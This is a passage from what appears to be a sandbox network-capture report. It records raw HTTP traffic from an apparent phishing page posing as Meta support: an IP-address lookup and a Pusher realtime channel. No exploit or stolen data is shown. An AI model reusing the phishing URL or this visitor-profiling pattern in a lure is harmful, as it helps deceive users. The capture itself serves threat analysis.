same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Access-Control-Allow-Origin: Strict-Transport-Security: max-age=15552000; includeSubDomains
2023-05-15 17:27:11 UTC	3701	IN	Data Raw: 58 2d 46 42 2d 44 65 62 75 67 3a 20 54 6d 62 77 4e 79 72 72 76 46 52 68 75 53 6e 49 4e 67 50 49 76 61 34 59 77 4f 7a 68 61 7a 77 69 59 52 52 77 33 6d 58 53 57 53 56 36 39 65 43 38 72 57 39 65 64 36 36 58 55 42 4e 4a 74 39 53 53 58 63 79 6f 31 79 2f 4b 47 38 37 64 44 4f 34 47 4b 6b 76 46 4a 41 3d 3d 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 35 20 4d 61 79 20 32 30 32 33 20 31 37 3a 32 37 3a 31 31 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: X-FB-Debug: TmbwNyrrvFRhuSnINgPIva4YwOzhazwiYRRw3mXSWSV69eC8rW9ed66XUBNJt9SSXcyo1y/KG87dDO4GKkvFJA==Date: Mon, 15 May 2023 17:27:11 GMTTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400Connection: close
2023-05-15 17:27:11 UTC	3701	IN	Data Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bGIF89a!,D;0

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:12 UTC	3701	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" Accept: application/json, text/plain, / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://meta-support-appeal-121990471.web.app Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://meta-support-appeal-121990471.web.app/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:12 UTC	3702	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://meta-support-appeal-121990471.web.app Content-Length: 23 Content-Type: application/json Date: Mon, 15 May 2023 17:27:12 GMT Vary: Origin Connection: close
2023-05-15 17:27:12 UTC	3702	IN	Data Raw: 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 37 22 7d Data Ascii: {"ip":"102.129.143.47"}

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:13 UTC	3702	OUT	OPTIONS /pusher/app/0d3b34df0b6b9220c260/870/ujk1o8qr/xhr_send?t=1684171631935&n=3 HTTP/1.1 Host: sockjs-eu.pusher.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type Origin: https://meta-support-appeal-121990471.web.app User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://meta-support-appeal-121990471.web.app/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:13 UTC	3702	IN	HTTP/1.1 204 No Content Server: nginx/1.21.6 Date: Mon, 15 May 2023 17:27:13 GMT Connection: close Access-Control-Allow-Origin: https://meta-support-appeal-121990471.web.app Vary: Origin Access-Control-Allow-Headers: content-type Access-Control-Allow-Credentials: true Cache-Control: public, max-age=31536000 Expires: Tue, 14 May 2024 17:27:13 GMT Access-Control-Allow-Methods: OPTIONS, POST Access-Control-Max-Age: 31536000

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:15 UTC	3703	OUT	POST /pusher/app/0d3b34df0b6b9220c260/870/ujk1o8qr/xhr_send?t=1684171631935&n=3 HTTP/1.1 Host: sockjs-eu.pusher.com Connection: keep-alive Content-Length: 2 sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Content-Type: application/json Accept: / Origin: https://meta-support-appeal-121990471.web.app Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://meta-support-appeal-121990471.web.app/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:15 UTC	3704	OUT	Data Raw: 5b 5d Data Ascii: []
2023-05-15 17:27:15 UTC	3704	IN	HTTP/1.1 204 No Content Server: nginx/1.21.6 Date: Mon, 15 May 2023 17:27:15 GMT Content-Type: text/plain; charset=UTF-8 Connection: close Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Access-Control-Allow-Origin: https://meta-support-appeal-121990471.web.app Vary: Origin Access-Control-Allow-Credentials: true